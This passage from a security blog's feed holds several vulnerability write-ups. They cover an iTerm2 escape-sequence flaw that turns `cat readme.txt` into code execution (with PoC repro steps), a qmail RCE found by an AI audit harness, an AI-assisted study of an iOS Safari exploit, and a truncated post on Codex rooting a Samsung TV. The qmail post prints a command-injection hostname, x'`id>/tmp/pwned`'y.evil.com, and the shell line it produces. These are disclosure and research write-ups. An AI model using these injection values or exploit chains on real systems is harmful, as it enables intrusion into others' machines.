we looked at how seemingly harmless workflows could cross a surprising line into code execution. This time we wanted to push that idea even further: is <code>cat readme.txt</code> safe?</p><p>It turns out that it is NOT, if you use iTerm2.</p><div id="youtube2-J-CyOJcKXwg" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;J-CyOJcKXwg&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/J-CyOJcKXwg?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>That looks insane until you understand what iTerm2 is trying to do for a legitimate feature, how it uses the PTY, and what happens when terminal output is able to impersonate one side of that feature's protocol.</p><blockquote><p>We'd like to acknowledge OpenAI for partnering with us on this project.</p></blockquote><h2>Background: iTerm2's SSH integration</h2><p>iTerm2 has an SSH integration feature that gives it a richer understanding of remote sessions. To make that work, it does not just "blindly type commands" into a remote shell. Instead, it bootstraps a tiny helper script on the remote side called the conductor.</p><p>The rough model is:</p><ol><li><p>iTerm2 launches SSH integration, usually through <code>it2ssh</code>.</p></li><li><p>iTerm2 sends a remote bootstrap script, the conductor, over the existing SSH session.</p></li><li><p>That remote script becomes the protocol peer for iTerm2.</p></li><li><p>iTerm2 and the remote conductor exchange terminal escape sequences to coordinate things like:</p><ul><li><p>discovering the login shell</p></li><li><p>checking for Python</p></li><li><p>changing directories</p></li><li><p>uploading files</p></li><li><p>running commands</p></li></ul></li></ol><p>The important point is that there is no separate network service. The conductor is just a script running inside the remote shell session, and the protocol is carried over normal terminal I/O.</p><h2>PTY refresher</h2><p>A terminal used to be a real hardware device: a keyboard and screen connected to a machine, with programs reading input from that device and writing output back to it.</p><p>A terminal emulator like iTerm2 is the modern software version of that hardware terminal. It draws the screen, accepts keyboard input, and interprets terminal control sequences.</p><p>But the shell and other command-line programs still expect to talk to something that looks like a real terminal device. That is why the OS provides a PTY, or pseudoterminal. A PTY is the software stand-in for the old hardware terminal, and it sits between the terminal emulator and the foreground process.</p><p>In a normal SSH session:</p><ul><li><p>iTerm2 writes bytes to the PTY</p></li><li><p>the foreground process is <code>ssh</code></p></li><li><p><code>ssh</code> forwards those bytes to the remote machine</p></li><li><p>the remote conductor reads them from its stdin</p></li></ul><p>So when iTerm2 wants to "send a command to the remote conductor," what it actually does locally is write bytes to the PTY.</p><h2>The conductor protocol</h2><p>The SSH integration protocol uses terminal escape sequences as its transport.</p><p>Two pieces matter here:</p><ul><li><p><code>DCS 2000p</code> is used to hook the SSH conductor</p></li><li><p><code>OSC 135</code> is used for pre-framer conductor messages</p></li></ul><p>At source level, <code>DCS 2000p</code> causes iTerm2 to instantiate a conductor parser. Then the parser accepts <code>OSC 135</code> messages like:</p><ul><li><p><code>begin &lt;id&gt;</code></p></li><li><p>command output lines</p></li><li><p><code>end &lt;id&gt; &lt;status&gt; r</code></p></li><li><p><code>unhook</code></p></li></ul><p>So a legitimate remote conductor can talk back to iTerm2 entirely through terminal output.</p><h2>The core bug</h2><p>The bug is a trust failure. iTerm2 accepts the SSH conductor protocol from terminal output that is not actually coming from a trusted, real conductor session. In other words, untrusted terminal output can impersonate the remote conductor.</p><p>That means a malicious file, server response, banner, or MOTD can print:</p><ul><li><p>a forged <code>DCS 2000p</code> hook</p></li><li><p>forged <code>OSC 135</code> replies</p></li></ul><p>and iTerm2 will start acting like it is in the middle of a real SSH integration exchange. That is the exploit primitive.</p><h2>What the exploit is really doing</h2><p>The exploit file contains a fake conductor transcript.</p><p>When the victim runs:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh">cat readme.txt</code></pre></div><p>iTerm2 renders the file, but the file is not just text. It contains:</p><ol><li><p>a fake <code>DCS 2000p</code> line that announces a conductor session</p></li><li><p>fake <code>OSC 135</code> messages that answer iTerm2's requests</p></li></ol><p>Once the hook is accepted, iTerm2 starts its normal conductor workflow. In upstream source, <code>Conductor.start()</code> immediately sends <code>getshell()</code>, and after that succeeds it sends <code>pythonversion()</code>.</p><p>So the exploit does not need to inject those requests. iTerm2 issues them itself, and the malicious output only has to impersonate the replies.</p><h2>Walking the state machine</h2><p>The fake <code>OSC 135</code> messages are minimal but precise.</p><p>They do this:</p><ol><li><p>Start a command body for <code>getshell</code></p></li><li><p>Return lines that look like shell-discovery output</p></li><li><p>End that command successfully</p></li><li><p>Start a command body for <code>pythonversion</code></p></li><li><p>End that command with failure</p></li><li><p>Unhook</p></li></ol><p>This is enough to push iTerm2 down its normal fallback path. At that point, iTerm2 believes it has completed enough of the SSH integration workflow to move on to the next step: building and sending a <code>run(...)</code> command.</p><h2>Where <code>sshargs</code> comes in</h2><p>The forged <code>DCS 2000p</code> hook contains several fields, including attacker-controlled <code>sshargs</code>.</p><p>That value matters because iTerm2 later uses it as command material when it constructs the conductor's <code>run ...</code> request.</p><p>The exploit chooses <code>sshargs</code> so that when iTerm2 base64-encodes:</p><div class="callout-block" data-callout="true"><p>run &lt;padding&gt;&lt;magic-bytes&gt;</p></div><p>the last 128-byte chunk becomes:</p><div class="callout-block" data-callout="true"><p>ace/c+aliFIo</p></div><p>That string is not arbitrary. It is chosen because it is both:</p><ul><li><p>valid output from the conductor encoding path</p></li><li><p>a valid relative pathname</p></li></ul><h2>The PTY confusion that makes exploitation possible</h2><p>In a legitimate SSH integration session, iTerm2 writes base64-encoded conductor commands to the PTY, and <code>ssh</code> forwards them to the remote conductor. In the exploit case, iTerm2 still writes those commands to the PTY, but there is no real SSH conductor. The local shell receives them as plain input instead.</p><p>That is why the session looks like this when recorded:</p><ul><li><p><code>getshell</code> appears as base64</p></li><li><p><code>pythonversion</code> appears as base64</p></li><li><p>then a long base64-encoded <code>run ...</code> payload appears</p></li><li><p>the last chunk is <code>ace/c+aliFIo</code></p></li></ul><p>Earlier chunks fail as nonsense commands. The final chunk works if that path exists locally and is executable.</p><h2>Steps to reproduce</h2><p>You can reproduce the original file-based PoC with <code>genpoc.py</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh">python3 genpoc.py
unzip poc.zip
cat readme.txt</code></pre></div><p>This creates:</p><ul><li><p><code>ace/c+aliFIo</code>, an executable helper script</p></li><li><p><code>readme.txt</code>, a file containing the malicious <code>DCS 2000p</code> and <code>OSC 135</code> sequences</p></li></ul><p>The first fools iTerm2 into talking to a fake conductor. The second gives the shell something real to execute when the final chunk arrives.</p><p>For the exploit to work, run <code>cat readme.txt</code> from the directory containing <code>ace/c+aliFIo</code>, so the final attacker-shaped chunk resolves to a real executable path.</p><h2>Disclosure timeline</h2><ul><li><p>Mar 30: We reported the bug to iTerm2.</p></li><li><p>Mar 31: The bug was fixed in commit <code>a9e745993c2e2cbb30b884a16617cd5495899f86</code>.</p></li><li><p>At the time of writing, the fix has not yet reached stable releases.</p></li></ul><p>When the patch commit landed, we tried to rebuild the exploit from scratch using the patch alone. The prompts used for that process are in <a href="https://github.com/califio/publications/tree/main/MADBugs/iTerm2/prompts.md"><code>prompts.md</code></a>, and the resulting exploit is <code>genpoc2.py</code>, which works very similarly to <code>genpoc.py</code>.</p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[We Asked Claude to Audit Sagredo's qmail. It found a RCE.]]></title><description><![CDATA[One prompt, 101 minutes, and a working exploit against a widely deployed qmail fork.]]></description><link>https://blog.calif.io/p/we-asked-claude-to-audit-sagredos</link><guid isPermaLink="false">https://blog.calif.io/p/we-asked-claude-to-audit-sagredos</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Thu, 16 Apr 2026 20:04:22 GMT</pubDate><content:encoded><![CDATA[<blockquote><p><em>"Find vulnerabilities in latest version of qmail: https://github.com/sagredo-dev/qmail. Focus on vulnerabilities that could result in RCE or system compromise by processing a crafted email."</em></p></blockquote><p>That was the entire prompt. </p><p>One hour and forty-one minutes later, our in-house harness had spun up a test environment, audited the codebase, found a remote code execution vulnerability, written a working exploit, generated a patch, and produced a <a href="https://github.com/califio/publications/tree/main/MADBugs/qmail">full technical report</a>, all without a human touching a terminal.</p><h2>The Most Secure Software Ever Written</h2><p>If you've spent any time around mail servers, you know qmail. And if you know qmail, you know Daniel J. Bernstein.</p><p>Most people today know DJB as the cryptographer behind a whole ballroom of dancing ciphers and curves: Salsa20, ChaCha20, Tango20 (okay, not Tango), plus Curve25519 and Ed25519, which now sign roughly every SSH session and TLS handshake on the planet. But a decade before any of that, DJB was the guy who decided email security was a solved problem and then solved it.</p><p>He wrote qmail in 1995 as a direct rebuke to Sendmail, which at the time was less a mail transfer agent and more a recurring CVE subscription. qmail was deliberately small and paranoid, splitting mail handling across seven mutually-distrustful Unix users so that a bug in one component couldn't touch another. DJB was confident enough in the result to put up a $500 bounty, later raised to $1,000, for anyone who could find a security hole.</p><p>For nearly a decade, nobody could. Then in 2005, Georgi Guninski found an integer overflow in <code>stralloc_readyplus</code> that could be triggered on 64-bit systems with absurd amounts of RAM. DJB, being DJB, <a href="https://cr.yp.to/qmail/guarantee.html">refused to pay</a>, arguing that nobody actually runs qmail on a machine with gigabytes of memory and no resource limits. Qualys eventually <a href="https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt">proved it exploitable in 2020</a>, and the "nobody" in question turned out to be "most of the Internet."</p><p>Disputed payouts aside, qmail became the canonical example of secure software design, the subject of papers and university courses, and "be like qmail" became shorthand for doing security properly. Then DJB stopped maintaining it: the last release, qmail 1.03, shipped in June 1998, and there has never been a 1.04.</p><h2>The Ship of Theseus Problem</h2><p>The Internet, inconveniently, did not stop in 1998. A mail server from the Clinton administration doesn't speak STARTTLS, doesn't know about SPF, DKIM, DMARC, SMTP AUTH, or IPv6, and has no idea what to do about the modern spam ecosystem, so the community did what communities do and started patching.</p><p>Over 25+ years, qmail accumulated an enormous orbit of third-party patches: netqmail, qmail-tls, vpopmail integration, CHKUSER, SURBL, and dozens more. Eventually people got tired of applying forty patches in the right order, and consolidated distributions emerged. One of the most popular today is <a href="https://github.com/sagredo-dev/qmail">Roberto Puzzanghera's (sagredo) qmail</a>, a batteries-included fork that bundles the patches a modern mail admin actually needs.</p><p>The problem is that DJB's security guarantee covered DJB's code, and the thousand-dollar bounty was for qmail 1.03. Every patch bolted on since then was written by someone else, reviewed by someone else (or no one), and merged into a codebase whose original safety arguments may no longer hold. The hull is original, but the rigging is not.</p><h2>What the Machine Found</h2><p>Our system zeroed in on a feature called <code>notlshosts_auto</code> that was added in October 2024. The idea behind it is reasonable: when qmail tries to deliver mail and the remote server's TLS is broken, you don't want to retry TLS forever, so this feature automatically remembers the bad host by creating a marker file named after it, and future deliveries skip TLS for that host. The implementation lives in <code>qmail-remote.c</code>, inside the TLS error handler <code>tls_quit()</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">sprintf(acfcommand, "/bin/touch %s/control/notlshosts/'%s'",
        info-&gt;pw_dir, partner_fqdn);
fp = popen(acfcommand, "r");</code></pre></div><p>It builds a shell command containing the remote hostname and runs it with <code>popen()</code>. The author wrapped the hostname in single quotes, presumably thinking that neutralizes shell metacharacters, but that protection fails the moment the hostname contains a single quote of its own.</p><p>The obvious objection is that hostnames can't contain single quotes, and that's true of <em>host names</em> in the RFC 952 sense, but it is not true of DNS labels. On the wire, a DNS label is just a length byte followed by up to 63 arbitrary bytes; RFC 1035 lets you put nearly anything in there, and most recursive resolvers will happily pass it through. When qmail calls glibc's <code>dn_expand()</code> to decode an MX record, some special characters get escaped, but <code>'</code>, <code>`</code>, <code>|</code>, <code>&amp;</code>, <code>&lt;</code>, and <code>&gt;</code> come through untouched. The net result is that <code>partner_fqdn</code>, the string being pasted into a shell command, is attacker-controlled via DNS.</p><h2>The Kill Chain</h2><ol><li><p>Attacker registers <code>evil.com</code>.</p></li><li><p>Attacker sets its MX record to point at a "hostname" like:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">x'`id&gt;/tmp/pwned`'y.evil.com</code></pre></div><p>That's 29 bytes in the first label, well within the 63-byte limit and perfectly legal on the wire.</p></li><li><p>Attacker points an A record for that name at a server they run, which speaks just enough SMTP to advertise <code>STARTTLS</code> and then deliberately botch the handshake.</p></li><li><p>Victim's qmail server tries to deliver <em>any</em> email to <code>evil.com</code>: a direct send, a forward, a mailing list bounce, an autoreply, whatever.</p></li><li><p>TLS fails, <code>tls_quit()</code> fires, and <code>popen()</code> runs:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">/bin/touch /var/qmail/control/notlshosts/'x'`id&gt;/tmp/pwned`'y.evil.com'</code></pre></div></li><li><p>The shell sees the single quotes close and reopen around a backtick substitution, and dutifully executes <code>id&gt;/tmp/pwned</code> as the <code>qmailr</code> user.</p></li></ol><p>We've published the full chain (Dockerized repro environment, DNS hook, fake SMTP server, exploit script, patch, and the AI-generated technical report) at <a href="https://github.com/califio/publications/tree/main/MADBugs/qmail">github.com/califio/publications/tree/main/MADBugs/qmail</a>.</p><p>We reported the issue to Roberto Puzzanghera, who fixed it promptly in commit <a href="https://github.com/sagredo-dev/qmail/commit/749f607f6885e3d01b36f2647d7a1db88f1ef741"><code>749f607</code></a> and shipped the fix in <a href="https://github.com/sagredo-dev/qmail/releases/tag/v2026.04.07">v2026.04.07</a>. If you run sagredo's qmail with <code>notlshosts_auto</code> enabled, you should upgrade.</p><h2>The Takeaway</h2><p>To be clear, this is not a DJB bug. You won't find <code>popen()</code> anywhere in qmail 1.03; it lives entirely in a community patch. And as shell injections go, it's not a particularly subtle one. A careful human reviewer would have caught it too.</p><p>What's notable is the cost. The input was one sentence and a URL, and the output was a verified exploit, a patch, and a report, with the reasoning in between (that DNS labels carry arbitrary bytes, that <code>dn_expand()</code> doesn't escape backticks, that the data flows into <code>popen()</code>) worked out unattended. That kind of end-to-end audit used to be expensive enough that most patch collections like this one simply never got reviewed. It isn't expensive anymore, for defenders or for attackers.</p><p>The practical conclusion is that this capability is worth pointing at your own code: the stuff you ship, and the dependencies you pull in. If 101 minutes of machine time can find bugs like this, you'd rather they be your 101 minutes than someone else's.</p><p>The software that survives the next decade will be the software that was audited by the same thing that's attacking it.</p><p><em>Write-up, PoC, and patch: <a href="https://github.com/califio/publications/tree/main/MADBugs/qmail">github.com/califio/publications/tree/main/MADBugs/qmail</a>. The vulnerability has been assigned <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41113">CVE-2026-41113</a>.</em></p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[Learning to Jailbreak an iPhone with Claude (Part 1)]]></title><description><![CDATA[Claude helped me take apart an iOS Safari exploit, and retune it for my Mac. It even wrote its own variant.]]></description><link>https://blog.calif.io/p/learning-to-jailbreak-an-iphone-with</link><guid isPermaLink="false">https://blog.calif.io/p/learning-to-jailbreak-an-iphone-with</guid><pubDate>Wed, 15 Apr 2026 07:58:17 GMT</pubDate><content:encoded><![CDATA[<p>Claude is making waves in the vulnerability research community. Skills that took years to hone are becoming a commodity overnight, and that&#8217;s worrying.</p><p>In this series I want to explore the upside of the same shift: how we can learn alongside it. So I picked the thing that I&#8217;d always been curious about: take apart a real iPhone jailbreak, end to end, and actually understand it.</p><p>The vehicle is <strong>Coruna</strong>, a commercial spyware kit that leaked in full recently: a complete Safari-to-kernel chain for iOS 17, <a href="https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit">caught in the wild by Google</a>, now patched and public. Professional-grade exploitation code, written by people who do this for a living.</p><p><strong>Part 1</strong> is the first stage: CVE-2024-23222, a race condition deep inside Safari&#8217;s JavaScript engine, and the twelve-step climb from &#8220;one missing type check&#8221; to &#8220;read and write any byte in the process.&#8221;</p><p>Coruna&#8217;s exploit for it is calibrated for iPhone hardware and misses almost every time on a Mac, so the concrete deliverable for this part was Claude retuning it (timing constants, loop counts, heap-groom sizes) until it landed reliably on M-series silicon, with every change explained.</p><p>In a separate experiment Claude also produced its <em>own</em> working exploit for CVE-2024-23222, without Coruna as a reference. <strong>It didn&#8217;t just rediscover Coruna&#8217;s attack; it found its own way in</strong>. We&#8217;ll come back to this in a separate post.</p><h2>What it was like</h2><p>Working with Claude on this felt like having a Nobel laureate who&#8217;s happy to spend the afternoon on undergrad problem sets. No implied &#8220;this is beneath me,&#8221; no rationing of attention to questions that are interesting <em>enough</em>.</p><p>When an explanation wasn&#8217;t landing it would just <em>go build the thing</em>: spin up the debugger, write the measurement script, hand me the curve. The vulnerable WebKit wouldn&#8217;t even compile on my laptop at first, and it took Claude most of a night to figure out why.</p><p>Preparing Part 1 took me somewhere between 40 and 80 hours, most of it spent asking Claude the kind of questions you&#8217;d be embarrassed to ask a person twice. The trick to learning this way is to let the AI assist, not lead. If it just hands you the answer there&#8217;s nothing left to discover, and the current state is almost accidentally ideal for that: it gets things wrong just often enough that you have to push back, verify, and actually understand. The friction is the lesson.</p><p>If that holds, this is a glimpse of the future of education: anyone with a laptop and (of course) the tokens to pay for it gets the depth of attention a PhD advisor gives their best student.</p><blockquote><p>A caveat: although I tried hard to verify and challenge everything Claude gave me, it can still hand me a confident, wrong explanation and I&#8217;ll nod along because I don&#8217;t have the background to catch it. Parts of the write-ups are almost certainly off in ways neither of us noticed. If you spot something, I&#8217;d like to hear it.</p></blockquote><h2>Read it</h2><p><strong><a href="https://github.com/califio/publications/blob/main/MADBugs/coruna/Stage1-writeup.md">Part 1 is here</a></strong> (~14,000 words). It&#8217;s self-contained: no prior JIT-exploitation background assumed, and every claim that can be checked at a debugger prompt was checked at one. The <a href="https://github.com/califio/publications/tree/main/MADBugs/coruna/poc">PoC repo</a> has build steps if you want to see read64/write64 land on your own machine.</p><p>Part 2 picks up where this leaves off: arbitrary read/write inside Safari, but no code execution yet, because every return address on modern iPhones is cryptographically signed and you can&#8217;t forge the signatures. Coruna&#8217;s answer to that is next.</p><h2>Acknowledgments</h2><p>This builds on prior reverse-engineering work by Huy Nguyen, wh1te4ever, Duy Tran, Nathan, hrtowii, Nick Chan, and others in the jailbreak community who took Coruna apart first. Filip Pizlo&#8217;s &#8220;<a href="https://webkit.org/blog/10308/speculation-in-javascriptcore/">Speculation in JavaScriptCore</a>&#8220; and Samuel Gro&#223;&#8217;s <a href="https://phrack.org/issues/70/3.html">Phrack</a> and <a href="https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html">Project Zero</a> posts are the foundation everything here stands on.</p><p>&#8212;thai</p>]]></content:encoded></item><item><title><![CDATA[Codex Hacked a Samsung TV]]></title><description><![CDATA[We gave Codex a foothold. It popped a root shell.]]></description><link>https://blog.calif.io/p/codex-hacked-a-samsung-tv</link><guid isPermaLink="false">https://blog.calif.io/p/codex-hacked-a-samsung-tv</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Mon, 13 Apr 2026 19:05:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!3p6C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This post documents our research into using AI to hack hardware devices. We'd like to acknowledge OpenAI for partnering with us on this project.</p><blockquote><p>No TVs were seriously harmed during this research. One may have experienced mild distress from being repeatedly rebooted remotely by an AI.</p></blockquote><p>We started with a shell inside the browser application on a Samsung TV, and a fairly simple question: if we gave Codex a reliable way to work against the live device and the matching firmware source, could it take that foothold all the way to root?</p><p>Codex had to enumerate the target, narrow the reachable attack surface, audit the matching vendor driver source, validate a physical-memory primitive on the live device, adapt its tooling to Samsung's execution restrictions, and iterate until the browser process became root on a real compromised device.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3p6C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3p6C!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3p6C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg" width="4032" height="3024" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:3024,&quot;width&quot;:4032,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The subject&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The subject" title="The subject" srcset="https://substackcdn.com/image/fetch/$s_!3p6C!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Note that the target TV is an older model running an outdated version of Chrome and an outdated kernel.</p><h2>Table of Contents</h2><ul><li><p><a href="https://blog.calif.io/i/194088814/the-harness">The Harness</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-goal">The Goal</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-facts">The Facts</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-vulnerability">The Vulnerability</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-constraint">The Constraint</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-primitive">The Primitive</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-root-cause">The Root Cause</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-chain">The Chain</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-exploit">The Exploit</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-final-run">The Final Run</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-bromance">The Bromance</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/conclusion">Conclusion</a></p></li></ul><h2>The Harness</h2><p>We didn't provide a bug or an exploit recipe. We provided an environment Codex could actually operate in, and the easiest way to understand it is to look at the pieces separately.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JU0D!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JU0D!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 424w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 848w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1272w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JU0D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png" width="980" height="620" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:620,&quot;width&quot;:980,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The harness&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The harness" title="The harness" 